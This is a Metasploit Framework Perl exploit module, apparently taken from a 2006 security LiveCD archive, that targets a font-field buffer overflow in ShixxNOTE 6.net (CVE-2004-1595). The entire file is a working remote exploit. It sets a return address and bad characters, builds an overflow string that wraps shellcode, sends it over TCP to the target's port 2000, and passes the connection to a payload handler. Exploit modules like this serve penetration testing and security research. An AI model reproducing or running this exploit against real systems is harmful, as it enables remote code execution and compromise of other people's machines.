home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / shixxnote_font.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  104 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::shixxnote_font;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'  => 'ShixxNOTE 6.net Font Buffer Overflow',
  21.     'Version'  => '$Revision: 1.2 $',
  22.     'Authors' => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp' ],
  25.     'Priv'  => 1,
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 2000],
  30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  31.       },
  32.     'AutoOpts' => { 'EXITFUNC' => 'process' },
  33.     'Payload'  =>
  34.       {
  35.         'Space'     => 650,
  36.         'BadChars'  => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
  37.         'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
  38.         'Keys'      => ['+ws2ord'],
  39.       },
  40.  
  41.     'Description'  => Pex::Text::Freeform(qq{
  42.     This module exploits a buffer overflow in ShixxNOTE 6.net. 
  43.     The vulnerability is caused due to boundary errors in the
  44.      handling of font fields. 
  45. }),
  46.  
  47.     'Refs'  =>  [
  48.         ['CVE', '2004-1595'],
  49.         ['BID', '11409'],
  50.       ],
  51.     'Targets' => [
  52.         ['ShixxNOTE 6.net Universal', 0x10041951],
  53.       ],
  54.  
  55.     'DefaultTarget' => 0,
  56.  
  57.     'DisclosureDate' => 'Oct 04 2004',
  58.  
  59.     'Keys' => ['shixxnote'],
  60.   };
  61.  
  62. sub new {
  63.     my $class = shift;
  64.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  65.     return($self);
  66. }
  67.  
  68. sub Exploit
  69. {
  70.     my $self = shift;
  71.     my $target_host = $self->GetVar('RHOST');
  72.     my $target_port = $self->GetVar('RPORT');
  73.     my $target_idx  = $self->GetVar('TARGET');
  74.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  75.     my $target = $self->Targets->[$target_idx];
  76.  
  77.     my $sploit =
  78.       Pex::Text::UpperCaseText(8). "~~". Pex::Text::UpperCaseText(102).
  79.       "\xeb\x06\x46\x92". pack('V', $target->[1]). $shellcode.
  80.       Pex::Text::UpperCaseText(200). ("~" x 10);
  81.  
  82.     $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
  83.  
  84.     my $s = Msf::Socket::Tcp->new
  85.       (
  86.         'PeerAddr'  => $target_host,
  87.         'PeerPort'  => $target_port,
  88.         'LocalPort' => $self->GetVar('CPORT'),
  89.         'SSL'       => $self->GetVar('SSL'),
  90.       );
  91.     if ($s->IsError) {
  92.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  93.         return;
  94.     }
  95.  
  96.     $s->Send($sploit);
  97.     $self->Handler($s);
  98.     $s->Close();
  99.     return;
  100. }
  101.  
  102. 1;
  103.  
  104.